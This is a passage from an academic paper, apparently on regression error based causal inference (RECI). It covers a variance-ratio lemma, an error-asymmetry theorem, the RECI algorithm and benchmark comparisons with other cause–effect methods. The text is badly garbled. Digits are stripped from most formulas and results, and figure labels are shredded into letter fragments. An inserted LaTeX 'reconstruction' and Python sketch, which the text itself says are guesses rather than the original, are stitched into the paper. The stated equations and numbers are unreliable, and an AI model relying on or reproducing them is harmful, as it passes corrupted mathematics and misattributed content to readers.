′(c)dc = and ∫ var[n|c]pc(c)dc =e[var[n|c]]= . in the following, the term independence postulate is used to refer to the aforementioned postulate and the term independence to a statistical independence, which should generally become clear from the context. theory as introduced in ‘general idea’, we aim to exploit an inequality of the expected prediction errors in terms of e[var[e|c]]≤e[var[c|e]] to infer the causal direction. 
in order to conclude this inequality and, thus, to justify an application to causal inference, we must restrict our analysis to the case where the noise variance is sufficiently small, since a more general statement is not possible under the aforementioned assumptions. the analysis can be formalized by the ratio of the expectations of the conditional variances in the limit α→ . we will then show lim α→ e[var[c|ẽα]] e[var[ẽα|c]] ≥ . error asymmetry theorem for our main theorem, we first need an important lemma: lemma (limit of variance ratio) let the assumptions – in ‘assumptions’ hold. then the following limit holds: lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = ∫ φ′(c) var[n|c]pc(c)dc ( ) proof: we first give some reminders of the definition of the conditional variance and some properties. for two random variables z and q the conditional variance of z, given q is defined by var[z|q] :=e[(z−e[z|q]) |q], while var[z|q] is the random variable attaining the value var[z|q] when q attains the value q. its expectation reads e[var[z|q]] := ∫ var[z|q]pq(q)dq. for any a∈r, we have var [ z a ∣∣q]= var[z|q] a . blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. for any function h, we have var[h(q)+z|q]=var[z|q], which implies var[h(q)|q]= . moreover, we have var[z|h(q)]=var[z|q], if h is invertible. to begin the main part of the proof, we first observe e[var[eα|c]]=e[var[φ(c)+αn|c]]=α e[var[n|c]]︸ ︷︷ ︸ = (assumpt. )) =α . ( ) moreover, one easily verifies that lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = lim α→ e[var[c|eα]] e[var[eα|c]] , ( ) due to ( ) provided that these limits exist. combining eqs. ( ) and ( ) yields lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = lim α→ e[var[c|eα]] α = lim α→ e [ var [ c α ∣∣eα]]. ( ) now, we can rewrite ( ) as lim α→ e [ var [ c α ∣∣eα]]= lim α→ e [ var [ φ− (eα−αn) α ∣∣eα]] = lim α→ ∫ φ( )+αn+ φ( )+αn− var [ φ− (e−αn) α ∣∣e]peα(e)de = lim α→ ∫ φ( ) φ( ) var [ φ− (e−αn) α ∣∣e]peα(e)de. ( ) in the latter step, αn+ and −αn− vanishes in the limit seeing that the function e →var [ φ − (e−αn)/α ∣∣e]peα(e) is uniformly bounded in α. this is firstly, because φ− attains only values in [ , ], and hence the variance is bounded by . secondly, peα(e) is uniformly bounded due to peα(e)= ∫ n+ n− pφ(c),n (e−αn,n)dn= ∫ n+ n− pc,n (φ − (e−αn),n)φ− ′ (e−αn)dn ≤‖φ − ′ ‖∞‖pc,n‖∞(n+−n−). accordingly, the bounded convergence theorem states lim α→ ∫ φ( ) φ( ) var [ φ− (e−αn) α ∣∣e]peα(e)de=∫ φ( ) φ( ) lim α→ ( var [ φ− (e−αn) α ∣∣e]peα(e))de. to compute the limit of var [ φ− (e−αn) α ∣∣e], blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we use taylor’s theorem to obtain φ − (e−αn)=φ− (e)−αnφ− ′ (e)− α n φ− ′′ (e (n,e)) , ( ) where e (n,e) is a real number in the interval (e−αn,e). since ( ) holds for every n∈[− e α , −e α ] (note that φ and φ− are bijections of [ , ], thus e−αn lies in [ , ]) it also holds for the random variable n if e (n,e) is replaced with the random variable e (n,e) (here, we have implicitly assumed that the map n →e (n,e) is measurable). therefore, we see that lim α→ var [ φ− (e−αn) α ∣∣e]= lim α→ var [ −nφ− ′ (e)− αn φ− ′′ (e (n,e)) ∣∣e ] =φ − ′(e) var[n|e]. ( ) moreover, we have lim α→ peα(e)=pe (e). ( ) inserting eqs. 
( ) and ( ) into ( ) yields lim α→ e [ var [ c α ∣∣e ]]=∫ φ( ) φ( ) φ − ′(e) var[n|e]pe (e)de = ∫ φ − ′(φ(c)) var[n|φ(c)]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc, where the second equality is a variable substitution using the deterministic relation e =φ(c) (which implies pe (φ(c))=pc(c)/φ ′(c) or, equivalently, the simple symbolic equation pe (e)de=pc(c)dc). this completes the proof due to ( ). � while the formal proof is a bit technical, the intuition behind this idea is quite simple: just think of the scatter plot of an almost deterministic relation as a thick line. then var[eα|c] and var[c|eα =φ(c)] are roughly the squared widths of the line at some point (c,φ(c)) measured in vertical and horizontal direction, respectively. the quotient of the widths in vertical and horizontal direction is then given by the slope. this intuition yields the following approximate identity for small α: var[c|ẽα=φ(c)]≈ (φ′(c)) var[ẽα|c =c]=α (φ′(c)) var[n|c]. ( ) taking the expectation of ( ) over c and recalling that assumption implies e[var[ẽα|c]]=α e[var[n|c]]=α already yields ( ). with the help of lemma , we can now formulate the core theorem of this paper: theorem (error asymmetry) let the assumptions – in ‘assumptions’ hold. then the following limit always holds lim α→ e[var[c|ẽα]] e[var[ẽα|c]] ≥ , with equality only if the function stated in assumption is linear. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. proof: we first recall that lemma states lim α→ e[var[c|ẽα]] e[var[ẽα|c]] = ∫ φ′(c) var[n|c]pc(c)dc. we then have∫ φ′(c) var[n|c]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc · ∫ var[n|c]pc(c)dc︸ ︷︷ ︸ = (assumpt. ) = ∫ √( φ′(c) ) var[n|c] pc(c)dc · ∫ √ var[n|c] pc(c)dc ≥  ∫ √( φ′(c) ) var[n|c] √ var[n|c]pc(c)dc   = (∫ φ′(c) var[n|c]pc(c)dc ) , ( ) where the inequality is just the cauchy schwarz inequality applied to the bilinear form f ,g → ∫ f (c)g(c)pc(c)dc for the space of functions f for which ∫ f (c)pc(c)dc exists. note that if φ is linear, ( ) becomes , since φ′= according to assumpt. . we can make a statement about ( ) in a similar way by using ( ) implied by the independence postulate and using cauchy schwarz:∫ φ′(c) var[n|c]pc(c)dc = ∫ φ′(c) var[n|c]pc(c)dc · ∫ φ ′(c)var[n|c]pc(c)dc︸ ︷︷ ︸ = ( ) = ∫ √ φ′(c) var[n|c] pc(c)dc · ∫ √ φ′(c)var[n|c] pc(c)dc ≥ (∫ √ φ′(c) var[n|c] √ φ′(c)var[n|c]pc(c)dc ) =   ∫ var[n|c]pc(c)dc︸ ︷︷ ︸ = (assumpt. )   = . ( ) combining eqs. ( ) and ( ) with lemma completes the proof. � blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. remark theorem states that the inequality holds for all values of α smaller than a certain finite threshold. whether this threshold is small or whether the asymmetry with respect to regression errors already occurs for large noise cannot be concluded from the theoretical insights. presumably, this depends on the features of φ, pc, pn|c in a complicated way. however, the experiments in ‘experiments’ suggest that the asymmetry often appears even for realistic noise levels. if the function φ is non-invertible, there is an information loss in anticausal direction, since multiple possible values can be assigned to the same input. therefore, we can expect that the error difference becomes even higher in these cases, which is supported by the experiments in ‘simulated cause–effect pairs with strong dependent noise’. algorithm a causal inference algorithm that exploits theorem can be formulated in a straightforward manner. 
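Several of the displayed formulas in the 'assumptions' and 'theory' passages above were damaged during text extraction. Before turning to the algorithm, the following LaTeX block therefore restates the central quantities as we reconstruct them from the surrounding prose; the exponents, the integration limits and the constants on the right-hand sides are our reading of the original rather than a verbatim copy.

\phi(c) := \mathbb{E}[E \mid C = c], \qquad \psi(e) := \mathbb{E}[C \mid E = e], \qquad
N := E - \phi(C), \qquad E_\alpha := \phi(C) + \alpha N, \qquad
\tilde{E}_\alpha := \frac{E_\alpha - \alpha n_-}{1 + \alpha n_+ - \alpha n_-} \in [0, 1].

% independence postulate and its implication
% (using \int_0^1 \phi'(c)\,dc = 1 and \mathbb{E}[\mathrm{Var}[N \mid C]] = 1):
\mathrm{Cov}\bigl[\phi',\ \mathrm{Var}[N \mid \cdot]\, p_C\bigr] = 0
\;\Longrightarrow\;
\int_0^1 \phi'(c)\, \mathrm{Var}[N \mid c]\, p_C(c)\, dc = 1.

% lemma (limit of the variance ratio) and theorem (error asymmetry):
\lim_{\alpha \to 0}
\frac{\mathbb{E}\bigl[\mathrm{Var}[C \mid \tilde{E}_\alpha]\bigr]}
     {\mathbb{E}\bigl[\mathrm{Var}[\tilde{E}_\alpha \mid C]\bigr]}
= \int_0^1 \frac{\mathrm{Var}[N \mid c]}{\phi'(c)^2}\, p_C(c)\, dc \;\ge\; 1,

with equality only if \phi is linear.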
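To make the asymmetry tangible, and as a preview of the reci procedure summarized in the algorithm below, here is a small self-contained simulation; it is our own illustrative sketch, not the authors' code. It draws an almost deterministic pair with a monotone cubic φ and cause-dependent noise, rescales both variables to [0, 1], fits a low-degree polynomial (standing in for the conditional expectation) in both directions, and compares the two mean squared errors. The particular φ, noise shape, sample size and polynomial degree are arbitrary choices made for illustration.

# minimal illustration of the error asymmetry / the reci decision rule (our sketch)
import numpy as np

rng = np.random.default_rng(0)

def rescale(v):
    """map a sample to [0, 1], the scaling convention assumed by the theory above."""
    return (v - v.min()) / (v.max() - v.min())

def mse_of_fit(a, b, degree=3):
    """least-squares polynomial fit b ~ p(a) and its mean squared error."""
    coeffs = np.polyfit(a, b, degree)
    return np.mean((b - np.polyval(coeffs, a)) ** 2)

alpha = 0.05                                        # small noise level
c = rng.uniform(0.0, 1.0, 2000)                     # cause with compact support [0, 1]
phi = 0.2 * c + 0.8 * c ** 3                        # strictly increasing, phi(0)=0, phi(1)=1
noise = rng.uniform(-1.0, 1.0, 2000) * (0.5 + c)    # noise amplitude depends on the cause
e = phi + alpha * noise                             # effect

x, y = rescale(c), rescale(e)
mse_y_given_x = mse_of_fit(x, y)                    # regression error in causal direction
mse_x_given_y = mse_of_fit(y, x)                    # regression error in anticausal direction

# for small alpha the causal direction should typically show the smaller error
print("x->y" if mse_y_given_x < mse_x_given_y else "y->x", mse_y_given_x, mse_x_given_y)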
given observations x,y sampled from a joint distribution px,y , the key idea is to fit regression models in both possible directions and compare the mse. we call this approach regression error based causal inference (reci) and summarize the algorithm in algorithm . although estimating the conditional expectations e[y|x] and e[x|y] by regression is a standard task in machine learning, we should emphasize that the usual issues of over- and underfitting are critical for our purpose (like for methods based on anms or pnls), because they under- or overestimate the noise levels. it may, however, happen that the method even benefits from underfitting: if there is a simple regression model in causal direction that fits the data quite well, but in anticausal relation the conditional expectation becomes more complex, a regression model with underfitting increases the error even more for the anticausal direction than for the causal direction. this speculative remark is related to ( ) and somehow supported by our experiments, where we observed that simple models performed better than complex models, even though they probably did not represent the true conditional expectation. also, an accurate estimation of the mse with respect to the regression model and appropriate preprocessing of the data, such as removing isolated points in low-density regions, might improve the performance.

algorithm : the proposed causal inference algorithm.
function reci(x, y)                          ▷ x and y are the observed data
    (x, y) ← rescaledata(x, y)
    f ← fitmodel(x, y)                       ▷ fit regression model f : x → y
    g ← fitmodel(y, x)                       ▷ fit regression model g : y → x
    mse_y|x ← meansquarederror(f, x, y)
    mse_x|y ← meansquarederror(g, y, x)
    if mse_y|x < mse_x|y then
        return x causes y
    else if mse_x|y < mse_y|x then
        return y causes x
    else
        return no decision
    end if
end function

while algorithm only rejects a decision if the errors are equal, one could think about utilizing the error difference as a rejection criterion for a decision. for instance, if the error difference is smaller than a certain threshold, the algorithm returns 'no decision'. this idea is further evaluated in 'error ratio as rejection criterion'.

experiments
in this section, we compare our algorithm with five different related methods for inferring the causal direction in various artificially generated and observed real-world data sets. in each evaluation, observations of two variables were given and the goal was to correctly identify the cause and the effect variable.

causal inference methods for comparison
in the following, we briefly discuss and compare the causal inference methods which we used for the evaluations.

lingam. the model assumptions of lingam (shimizu et al., ) are e = βc + n, where β ∈ r, c is statistically independent of n, and n is non-gaussian. while lingam is especially suitable for linear functional relationships with non-gaussian noise, it performs poorly if these assumptions are violated. the computational cost is, however, relatively low. for the experiments, we used a state-of-the-art implementation of lingam that utilizes an entropy-based method for calculating the likelihood ratios of the possible causal directions, instead of an independent component analysis based algorithm as in the original version (hyvärinen & smith, ). for this, eq. ( ) in hyvärinen & smith ( ) is used in order to estimate the likelihood ratio eq. ( ) in hyvärinen & smith ( ).

anm.
the anm (hoyer et al., ) approach assumes that e = f (c)+n, where f is nonlinear and cyn . an asymmetry between cause and effect is achieved by the assumption of an independence between cause and residual. therefore, this method requires fitting a regression function and performing an additional evaluation of the relation between input and residual, which lead to a high computational cost. note that the choice of the evaluation method is crucial for the performance. we used an implementation provided by mooij et al. ( ), which uses a gaussian process regression for the prediction and provides different methods for the evaluation blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of the causal direction. for the experiments, we chose different evaluation methods; hsic for statistical independence tests, an entropy estimator for the estimation of the mutual information between input and residuals (denoted as ent) and a bayesian model comparison that assumes gaussianity (denoted as fn). implementation details and parameters can be found in table of mooij et al. ( ). pnl. post non-linear models (zhang & hyvärinen, ) are a generalization of anms. here, it is assumed that e =g(f (c)+n), where g is nonlinear and cyn . due to the additional nonlinearity coming from g, this allows a non-additive influence of the noise as in contrast to an anm. for inferring the causal direction, the idea remains roughly the same; fit a pnl in both possible directions and check for independence between input and disturbance. however, the disturbance here is different from the regression residual and fitting a pnl model is a significantly harder problem than fitting an anm. in the experiments, we used an implementation provided by the authors zhang & hyvärinen ( ), where a constrained nonlinear independent component analysis is utilized for estimating the disturbances and hsic for statistical independence tests. igci. the igci (janzing et al., ) approach is able to determine the causal relationship in a deterministic setting e = f (c), under the ‘independence assumption’ cov[log f ′,pc]= , i.e., the (logarithmic) slope of the function and the cause distribution are uncorrelated. the causal direction can then be inferred if the kullback leibler divergence between a reference measure and px is bigger or smaller than the kullback leibler divergence between the same reference measure and py , respectively. the corresponding algorithm has been applied to noisy causal relations with partial success (and some heuristic justifications (janzing et al., )), but generalizations of igci for non-deterministic relations are actually not known and we consider assumption in ‘assumptions’ as first step towards a possibly more general formulation. the computational cost depends on the utilized method for estimating the information criterion, but is generally low. therefore, igci is the fastest of the methods. for the experiments, we also used an implementation provided by mooij et al. ( ), where we always tested all possible combinations of reference measures and information estimators. these combinations are denoted as igci-ij, where i and j indicate: • i=u: uniform reference measure (normalizing x and y ) • i=g: gaussian reference measure (standardizing x and y ) • j= : entropy estimator using eq. ( ) in daniušis et al. ( ) • j= : integral approximation of eq. ( ) in daniušis et al. ( ) • j= : integral approximation of eq. ( ) in mooij et al. ( ) blöbaum et al. 
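As a concrete illustration of the igci principle just described, the following sketch implements the simple slope-based estimator with a uniform reference measure, roughly corresponding to one of the integral-approximation variants listed above. It is our simplified reduction, not the toolbox implementation of mooij et al.; the tie handling and the plain difference quotients are illustrative shortcuts.

# illustrative slope-based igci estimator with uniform reference measure (our sketch)
import numpy as np

def _unit_scale(v):
    return (v - v.min()) / (v.max() - v.min())

def igci_score(x, y):
    """rough estimate of the expected log-slope of the map x -> y after scaling to [0, 1]."""
    x, y = _unit_scale(np.asarray(x, float)), _unit_scale(np.asarray(y, float))
    order = np.argsort(x)
    dx, dy = np.diff(x[order]), np.diff(y[order])
    keep = (dx != 0) & (dy != 0)          # skip ties to avoid division by zero and log(0)
    return np.mean(np.log(np.abs(dy[keep]) / dx[keep]))

def igci_direction(x, y):
    # the direction with the smaller score is inferred to be the causal one
    return "x->y" if igci_score(x, y) < igci_score(y, x) else "y->x"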
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cure. cure (sgouritsa et al., ) is based on the idea that an unsupervised regression of e on c by only using information from pc performs worse than an unsupervised regression of c on e by only using information from pe. cure implements this idea in a bayesian way via a modified gaussian process regression. however, since cure requires the generation of markov-chain-monte-carlo (mcmc) samples, the biggest drawback is a very high computational cost. an implementation of cure by the authors has been provided for our experiments. here, we used similar settings as described in section . of sgouritsa et al. ( ), where data samples were used and mcmc samples were generated. the number of internal repetitions depends on the experimental setting. slope. the slope approach by marx & vreeken ( ) is essentially motivated by ( ) and compares an estimation of (k(px)+k(py |x))/(k(px)+k(py )) with an estimation of (k(py )+k(px|y ))/(k(px)+k(py )) based on the minimum description length principle (rissanen, ). this approach uses a global and multiple local regression models to fit the data, where the description length of the fitted regression models and the description length of the error with respect to the data can be used to approximate k(py |x) and k(px|y ), respectively. seeing that multiple regression models need to be fit depending on the structure of the data, the computational costs can vary between data sets. for our experiments, we used the implementation provided by the authors with the same parameters as used in their experiments with real-world data. reci. our approach addresses non-deterministic nonlinear relations and, in particular, allows a dependency between cause and noise. since we only require the fitting of a least-squares solution in both possible causal directions, reci can be easily implemented. it does not rely on any independence tests and has, depending on the regression model and implementation details, a low computational cost. in the experiments, we have always used the same class of regression function for the causal and anticausal direction to compare the errors, but performed multiple experiments with different function classes. for each evaluation, we randomly split the data into training and test data, where we tried different ratios and selected the best performing model on the test data. the used percentage of training data were %, % or %, where the remaining data served as test data. in each run, we only randomly split the data once. the utilized regression models were: • a logistic function (log) of the form a+(b−a)/( +exp(c ·(d−x))) • shifted monomial functions (mon) of the form axn+b with n∈[ , ] • polynomial functions (poly) of the form ∑k i= aix i with k∈[ , ] • support vector regression (svr) with a linear kernel • neural networks (nn) with different numbers of hidden neurons: , , , , - , - , where ’-’ indicates two hidden layers the logistic and monomial functions cover rather simple regression models, which are probably not able to capture the true function φ in most cases. on the other hand, support vector regression and neural networks should be complex enough to capture φ. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the polynomial functions are rather simple too, but more flexible than the logistic and monomial functions. 
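To illustrate how one of these model classes is fit and scored, the sketch below fits the four-parameter logistic curve by least squares on a random training split and reports the held-out mse; scipy and numpy stand in here for the matlab routines actually used, the split fraction and starting values are arbitrary illustrative choices, and all function names are ours. The other classes (monomial, polynomial, svr, neural network) would be handled analogously; in reci the resulting test mses of the two candidate directions are then averaged over runs and compared.

# sketch of fitting the logistic model class a + (b - a) / (1 + exp(c * (d - x)))
import numpy as np
from scipy.optimize import curve_fit

def logistic(x, a, b, c, d):
    return a + (b - a) / (1.0 + np.exp(c * (d - x)))

def heldout_mse_logistic(x, y, train_frac=0.7, seed=0):
    """least-squares fit on a random training split, mse on the remaining test data."""
    rng = np.random.default_rng(seed)
    idx = rng.permutation(len(x))
    n_train = int(train_frac * len(x))
    tr, te = idx[:n_train], idx[n_train:]
    start = [float(y.min()), float(y.max()), 1.0, float(np.median(x))]   # rough initial guess
    params, _ = curve_fit(logistic, x[tr], y[tr], p0=start, maxfev=10000)
    return float(np.mean((y[te] - logistic(x[te], *params)) ** 2))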
we used the standard matlab implementation of these methods and have always chosen the default parameters, where the parameters of log, mon and poly were fitted by minimizing the least-squares error. during the experiments, we observed that the mse varied a lot in many data sets due to relatively small sample sizes and the random selection of training and test data. therefore, we averaged the mse over all performed runs within the same data set first before comparing them, seeing that this should give more accurate estimations of e[var[y |x]] and e[var[x|y]] with respect to the class of the regression function. although the choice of the function class for each data set is presumably a typical model selection problem, we did not optimize the choice for each data set individually. therefore, we only summarize the results of the best performing classes with respect to the experimental setup in the following. the estimated mse in each data set were averaged over all performed runs. a detailed overview of all results, including the performances and standard deviations of all function classes when estimating the mse in single and multiple runs, can be found in the supplements. for the normalization of the data we used ĉ := c−min(c) max(c)−min(c) ê := e−min(e) max(e)−min(e) and for the standardization we used ĉ := c−e[c] √ var[c] ê := e−e[e] √ var[e] . general remark. each evaluation was performed in the original data sets and in preprocessed versions where isolated points (low-density points) were removed. for the latter, we used the implementation and parameters from sgouritsa et al. ( ), where a kernel density estimator with a gaussian kernel is utilized to sort the data points according to their estimated densities. then, data points with a density below a certain threshold ( . in our experiments) are removed from the data set. in this way, outliers should have a smaller impact on the performance. it also shows how sensitive each approach is to outliers. however, removing outliers might lead to an underestimation of the noise in a heavy tail noise distribution and is, therefore, not always the best choice as a preprocessing step. note that cure per default uses this preprocessing step, also in the original data. in all evaluations, we forced a decision by the algorithms, where in case of anm the direction with the highest score of the independence test was taken. except for cure, we averaged the performances of each method over runs, where we uniformly sampled data points for anm and svr if the data set contains more than data points. for cure, we only performed four internal repetitions in the artificial blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. note, however, that adding noise to the cause (as it is done here) can also be considered as a kind of confounding. actually, c′ is the cause of e in the below generating model, while the noisy version c is not the cause of e. accordingly, c′ is the hidden common cause of c and e. here we refer to the scenario as an unconfounded case with measurement noise as in mooij et al. ( ). and eight internal repetitions in the real-world data sets due to the high computational cost. as performance measure, we consider the accuracy of correctly identifying the true causal direction. 
therefore, the accuracy is calculated according to accuracy= ∑m m= wmδd̂m,dm∑m m= wm , ( ) where m is the number of data sets, wm the weight of data set m, dm the correct causal direction and d̂m the inferred causal direction of the corresponding method. note that we consider wm= for all artificial data sets, while we use different weights for the real-world data sets. since we use all data points for slope, igci and lingam, these methods have a consistent performance over all runs. an overview of all utilized data sets with their corresponding number of cause–effect pairs and data samples can be found in table in the supplements. artificial data for experiments with artificial data, we performed evaluations with simulated cause–effect pairs generated for a benchmark comparison in mooij et al. ( ). further, we generated additional pairs with linear, nonlinear invertible and nonlinear non-invertible functions where input and noise are strongly dependent. simulated benchmark cause–effect pairs the work of mooij et al. ( ) provides simulated cause–effect pairs with randomly generated distributions and functional relationships under different conditions. as pointed out by mooij et al. ( ), the scatter plots of these simulated data look similar to those of real-world data. we took the same data sets as used in mooij et al. ( ) and extend the reported results with an evaluation with slope, cure, lingam, reci and further provide results in the preprocessed data. the data sets are categorized into four different categories: • sim: pairs without confounders. the results are shown in figs. a– b • sim-c: a similar scenario as sim, but with one additional confounder. the results are shown in figs. c– d • sim-ln: pairs with low noise level without confounder. the results are shown in figs. a- b • sim-g: pairs where the distributions of c and n are almost gaussian without confounder. the results are shown in figs. c– d. the general form of the data generation process without confounder but with measurement noise is c′∼pc,n ∼pn nc ∼n( ,σc),ne ∼n( ,σe) c =c′+nc e = fe(c ′ ,n)+ne blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original sim (b) preprocessed sim (c) original sim-c (d) preprocessed sim-c figure evaluation results of all methods in the sim and sim-c data sets. (a) and (c) show the results of the evaluations in the original data and (b) and (d) the results in the preprocessed versions where low- density points were removed. full-size doi: . /peerjcs. 
/fig- and with confounder c′∼pc,n ∼pn,z ∼pz c′′= fc(c ′ ,z) nc ∼n( ,σc),ne ∼n( ,σe) c =c′′+nc e = fe(c ′′ ,z,n)+ne, where nc,ne represent independent observational gaussian noise and the variances σc andσe are chosen randomly with respect to the setting. note that only ne is gaussian, while the regression residual is non-gaussian due to the nonlinearity of fe and non-gaussianity of n,z. thus, the noise in sim, sim-c and sim-g is non-gaussian. more details can be found in appendix c of mooij et al. ( ). blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y a n m -h si c a n m -e n t a n m -f n pn l sl o pe ig c i-u ig c i-u ig c i-u ig c i-g ig c i-g ig c i-g c u r e li n g a m r ec i-l o g r ec i-m o n r ec i-p o ly r ec i-s vr r ec i-n n . . . . a c c u ra c y (a) original sim-ln (c) original sim-g (b) preprocessed sim-ln (d) preprocessed sim-g figure evaluation results of all methods in the sim-ln and sim-g data sets. (a) and (c) show the re- sults of the evaluations in the original data and (b) and (d) the results in the preprocessed versions where low-density points were removed. full-size doi: . /peerjcs. /fig- generally, anm performs the best in all data sets. however, the difference between anm and reci, depending on the regression model, becomes smaller in the preprocessed data where isolated points were removed. according to the observed performances, removing these points seems to often improve the accuracy of reci, but decrease the accuracy of anm. in case of the preprocessed sim-g data sets, the accuracy of reci is decreased seeing that in these nearly gaussian data the removal of low-density points leads to an underestimation of the noise distribution. in all data sets, except for sim-g, reci always outperforms slope, igci, cure and lingam if a simple logistic or polynomial function is utilized for the regression. however, in the sim-g data set, our approach performs comparably poor, which could be explained by the violation of the assumption of a compact support. in this nearly gaussian setting, igci performs the best with a gaussian reference measure. however, we also evaluated reci with standardized data in the sim-g data sets, which is equivalent to a gaussian blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. reference measure for igci. a summary of the results can be found in figures (c)– (d) in the supplements and more detailed results in table and table in the supplements. these results are significantly better than normalizing the data in this case. however, although our theorem only justifies a normalization, a different scaling, such as standardization, might be a reasonable alternative. 
even though theorem does not exclude cases of a high noise level, it makes a clear statement about low noise level. therefore, as expected, reci performs the best in sim-ln, where the noise level is low. in all cases, lingam performs very poorly due to the violations of its core assumptions. surprisingly, although pnl is a generalization of anm, we found that pnl performs generally worse than anm, but better than slope, cure and lingam. anm and reci require a least-squares regression, but anm additionally depends on an independence test, which can have a high computational cost and a big influence on the performance. therefore, even though reci does not outperform anm, it represents a competitive alternative with a lower computational cost, depending on the regression model and mse estimation. also, seeing that reci explicitly allows both cases, a dependency and an independency between c and n and anm only the latter, it can be expected that reci performs significantly better than anm in cases where the dependency between c and n is strong. this is evaluated in ‘simulated cause–effect pairs with strong dependent noise’. in comparison with pnl, slope, igci, lingam and cure, reci outperforms in almost all data sets. note that mooij et al. ( ) performed more extensive experiments and showed more comparisons with anm and igci in these data sets, where additional parameter configurations were tested. however, they reported no results for the preprocessed data. simulated cause–effect pairs with strong dependent noise since the data sets of the evaluations in ‘simulated benchmark cause–effect pairs’ are generated by structural equations with independent noise variables, we additionally performed evaluations with artificial data sets where the input distribution and the noise distribution are strongly dependent. for this, we considered a similar data generation process as described in the work by daniušis et al. ( ). we generated data with various cause and noise distributions, different functions and varying values for α∈[ , ]. in order to ensure a dependency between c and n , we additionally introduced two unobserved source variables s and s that are randomly sampled from different distributions. variables c and n then consist of a randomly weighted linear combination of s and s . the general causal structure of these data sets is illustrated in fig. . note that s and s can be seen as hidden confounders affecting both c and e. apart from rather simple functions for φ, daniušis et al. ( ) proposed to generate more general functions in the form of convex combinations of mixtures of cumulative gaussian distribution functions ψ(c|µi,σi): sn(c)= n∑ i= βiψ(c|µi,σi), where βi,µi ∈[ , ] and σi ∈[ , . ]. for the experiments, we set n= and chose the parameters of s (c) randomly according to the uniform distribution. note that ψ(c|µi,σi) blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the general structure of the data generation process where c and n are dependent. in order to achieve this, cause and noise consist of a mixture of two sources s and s . full-size doi: . /peerjcs. /fig- is always monotonically increasing and thus s (c) can have an arbitrary random shape while being monotonically increasing. 
cause-effect pairs were then generated in the following way w ,w ∼u( , ) s ,s ∼ps s =s −e[s ] s =s −e[s ] c′=w ·f (s )+( −w )·f (s ) n ′=w ·f (s )+( −w )·f (s ) c =normalize(c′) n =α ·standardize(n ′) e =φ(c)+n, where the distributions of s and s and the functions f ,f ,f ,f were chosen randomly from ps and f in table , respectively. note that s and s can follow different distributions. the choice of φ depends on the data set, where we differentiated between three data sets: • linear: only the identity function φ(c)=c • invertible: arbitrary invertible functions φ(c)= s (c) • non-invertible: functions that are not invertible on the respective domain in total, we generated data sets for each value of parameter α, which controls the amount of noise in the data. in each generated data set, we randomly chose different distributions and functions. for linear and non-invertible the step size of α is . and for invertible . . here, we only performed one repetition on each data set for all algorithms. figs. a– c summarize all results and table in the supplements shows the best performing functions and parameters of the different causal inference methods. note that we omitted experiments with cure in these data sets due to the high computational cost. blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table all distributions ps, functions φ and functions f that were used for the generation of the linear, non-invertible and invertible data sets. in case of the functions for non-invertible, rescale (x,−n,n) denotes a rescaling of the input data x on [−n,n]. gmµ,σ denotes a gaussian mixture distribution with density pgmµ,σ (c)= (ϕ(c|µ ,σ )+ϕ(c|µ ,σ )) and gaussian pdf ϕ(c|µ,σ). data set φ(c) linear c ps f 